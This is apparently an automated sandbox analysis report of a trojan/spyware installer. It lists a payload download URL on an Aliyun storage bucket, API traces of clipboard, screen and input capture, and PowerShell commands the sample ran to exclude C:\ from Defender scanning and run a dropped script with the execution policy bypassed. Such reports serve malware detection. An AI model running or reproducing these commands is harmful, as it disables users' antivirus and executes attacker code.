                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000000.00000002.2078434267.00000000032FC000.00000004.00000010.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000000.00000002.2078434267.00000000032FC000.00000004.00000010.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000000.00000002.2078434267.00000000032FC000.00000004.00000010.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                      Source: powershell.exe, 00000013.00000002.2007422106.00000000049C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: leBwnyHIgx.exe, leBwnyHIgx.exe.0.drString found in binary or memory: http://www.innosetup.com/
                      Source: leBwnyHIgx.exe, leBwnyHIgx.exe.0.drString found in binary or memory: http://www.remobjects.com/ps
                      Source: powershell.exe, 00000003.00000002.1704205290.0000000004BC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.0000000004EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1781132282.0000000004271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2007422106.0000000004871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1998706833.00000000042CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1998706833.00000000042BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBtq
                      Source: powershell.exe, 0000000B.00000002.1781132282.00000000043C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                      Source: leBwnyHIgx.exe, leBwnyHIgx.exe.0.drString found in binary or memory: https://code.visualstudio.com/0
                      Source: powershell.exe, 00000013.00000002.2023878360.00000000058D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000013.00000002.2023878360.00000000058D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000013.00000002.2023878360.00000000058D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000000.00000002.2078434267.00000000032FC000.00000004.00000010.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000000.00000002.2078434267.00000000032FC000.00000004.00000010.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000000.00000002.2078434267.00000000032FC000.00000004.00000010.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0.
                      Source: powershell.exe, 00000013.00000002.2007422106.00000000049C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000003.00000002.1704205290.0000000005311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.000000000581D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.00000000055F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2007422106.0000000004FA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: powershell.exe, 00000003.00000002.1706524566.0000000005C27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1762406995.0000000005F28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1795405452.00000000052D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2023878360.00000000058D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.0000000000960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xrpy.oss-ap-southeast-1.aliyuncs.com/
                      Source: leBwnyHIgx.exe, 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpString found in binary or memory: https://xrpy.oss-ap-southeast-1.aliyuncs.com/wpsv.5.6.3.exe
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.0000000000960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xrpy.oss-ap-southeast-1.aliyuncs.com/wpsv.5.6.3.exeX
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.0000000000960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xrpy.oss-ap-southeast-1.aliyuncs.com/wpsv.5.6.3.exec
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.0000000000960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xrpy.oss-ap-southeast-1.aliyuncs.com/wpsv.5.6.3.exex
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknownHTTPS traffic detected: 47.79.48.230:443 -> 192.168.2.4:49732 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0307E850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,5_2_0307E850
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0307BC70 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC,5_2_0307BC70
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0307E4F0 Sleep,CreateMutexW,GetLastError,SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState,5_2_0307E4F0
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeWindows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dll
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_00CD18A7 GetModuleHandleA,CreateWindowExW,SendMessageW,CreateThread,PostQuitMessage,NtdllDefWindowProc_W,0_2_00CD18A7
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_00D918A7 GetModuleHandleA,CreateWindowExW,SendMessageW,CreateThread,PostQuitMessage,NtdllDefWindowProc_W,5_2_00D918A7
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_005FA9A8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_005FA9A8
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_005FA9A8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,5_2_005FA9A8
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0307B41B ExitWindowsEx,5_2_0307B41B
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0307B43F ExitWindowsEx,5_2_0307B43F
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0307B463 ExitWindowsEx,5_2_0307B463
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_0064F1DC0_2_0064F1DC
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_0040AC840_2_0040AC84
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_100167210_2_10016721
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_00CD00320_2_00CD0032
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_00CE66F80_2_00CE66F8
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04A0B4903_2_04A0B490
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04A0B4703_2_04A0B470
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0064F1DC5_2_0064F1DC
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0040AC845_2_0040AC84
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_03076EE05_2_03076EE0
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_03076C505_2_03076C50
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0308E3415_2_0308E341
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_030883815_2_03088381
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_030724B05_2_030724B0
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0308EA1D5_2_0308EA1D
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_030789005_2_03078900
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0308F9FF5_2_0308F9FF
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0308D89F5_2_0308D89F
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0308DDF05_2_0308DDF0
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0272122F5_2_0272122F
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0271B66A5_2_0271B66A
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_027217805_2_02721780
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_027124B05_2_027124B0
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_02721E5C5_2_02721E5C
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_02720CDE5_2_02720CDE
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_02722D915_2_02722D91
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_100167215_2_10016721
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_00D900325_2_00D90032
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_00DA66F85_2_00DA66F8
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_026C00325_2_026C0032
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_026D12065_2_026D1206
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_026CB6415_2_026CB641
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_026D17575_2_026D1757
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_026D0CB55_2_026D0CB5
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_026C24875_2_026C2487
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_026D2D685_2_026D2D68
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_02EF82BF5_2_02EF82BF
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_02F0D25E5_2_02F0D25E
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_02F0F3BE5_2_02F0F3BE
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_02EF689F5_2_02EF689F
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_02EF1E6F5_2_02EF1E6F
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_02EF660F5_2_02EF660F
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_02F0D7AF5_2_02F0D7AF
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_02F07D405_2_02F07D40
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_02F0DD005_2_02F0DD00
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\Downloads\wpsv.5.6.3.exe C6AC7D9ADD40B913112B265D4F366D9EF80BBD711049DB085FC750FCAD4E14D8
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: String function: 005C94E0 appears 40 times
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: String function: 005E0B90 appears 60 times
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: String function: 005E08AC appears 46 times
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: String function: 03084300 appears 32 times
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: String function: 005E0B90 appears 60 times
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: String function: 005C94E0 appears 40 times
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: String function: 005E08AC appears 46 times
                      Source: leBwnyHIgx.exe, 00000000.00000000.1657771308.0000000000672000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs leBwnyHIgx.exe
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077897111.000000000245A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs leBwnyHIgx.exe
                      Source: leBwnyHIgx.exe, 00000000.00000003.1717834094.0000000002970000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs leBwnyHIgx.exe
                      Source: leBwnyHIgx.exe, 00000005.00000002.4133552323.000000000268A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs leBwnyHIgx.exe
                      Source: leBwnyHIgx.exe, 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFileName vs leBwnyHIgx.exe
                      Source: leBwnyHIgx.exeBinary or memory string: OriginalFileName vs leBwnyHIgx.exe
                      Source: leBwnyHIgx.exe.0.drBinary or memory string: OriginalFileName vs leBwnyHIgx.exe
                      Source: leBwnyHIgx.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@29/27@1/2
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_005FA9A8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_005FA9A8
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_005FA9A8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,5_2_005FA9A8
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_03077740 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,5_2_03077740
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_03077620 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess,5_2_03077620
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_03077B70 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,5_2_03077B70
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_03076C50 wsprintfW,MultiByteToWideChar,GetDriveTypeW,GetDiskFreeSpaceExW,_memset,GlobalMemoryStatusEx,swprintf,swprintf,5_2_03076C50
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_10001FA0 CreateToolhelp32Snapshot,memset,Process32FirstW,WideCharToMultiByte,CloseHandle,Process32NextW,CloseHandle,0_2_10001FA0
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_0060F338 GetVersion,CoCreateInstance,0_2_0060F338
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_0046523C FindResourceW,LoadResource,SizeofResource,LockResource,0_2_0046523C
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeFile created: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3428:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5288:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeMutant created: \Sessions\1\BaseNamedObjects\2024.12.25
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5472:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5640:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6544:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeMutant created: \Sessions\1\BaseNamedObjects\VJANCAVESU
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeFile created: C:\Users\user\AppData\Local\Temp\PolicyManagement.xml
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeFile read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: leBwnyHIgx.exeVirustotal: Detection: 29%
                      Source: leBwnyHIgx.exeReversingLabs: Detection: 23%
                      Source: leBwnyHIgx.exeString found in binary or memory: /LoadInf=
                      Source: leBwnyHIgx.exeString found in binary or memory: /LoadInf=
                      Source: leBwnyHIgx.exeString found in binary or memory: -Helper process exited with failure code: 0x%x
                      Source: leBwnyHIgx.exeString found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
                      Source: leBwnyHIgx.exeString found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
                      Source: leBwnyHIgx.exeString found in binary or memory: /LoadInf=
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeFile read: C:\Users\user\Desktop\leBwnyHIgx.exe
                      Source: unknownProcess created: C:\Users\user\Desktop\leBwnyHIgx.exe "C:\Users\user\Desktop\leBwnyHIgx.exe"
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeProcess created: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe "C:\Users\user\AppData\Roaming\leBwnyHIgx.exe"
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeProcess created: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe "C:\Users\user\AppData\Roaming\leBwnyHIgx.exe"
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: msvcp140.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: slc.dll
